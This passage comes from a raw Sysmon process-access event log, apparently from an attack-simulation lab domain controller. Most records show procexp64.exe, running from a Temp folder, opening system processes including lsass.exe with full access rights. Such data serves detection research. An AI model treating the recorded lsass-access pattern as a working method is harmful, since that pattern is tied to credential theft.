Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792185Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792184Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792183Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792182Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792181Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792180Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792179Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792178Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792177Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792176Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792175Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792174Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792173Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792172Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792171Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792170Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792169Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792168Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792167Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792166Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792165Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792164Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792163Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792162Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792161Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792160Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792159Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792158Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.688{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+15eb9|C:\Windows\System32\SHELL32.dll+b07e0|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792157Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.688{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792156Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.688{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792155Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.688{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792154Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.688{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792153Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.688{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792152Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.079{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792151Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.079{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792150Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.079{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792149Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 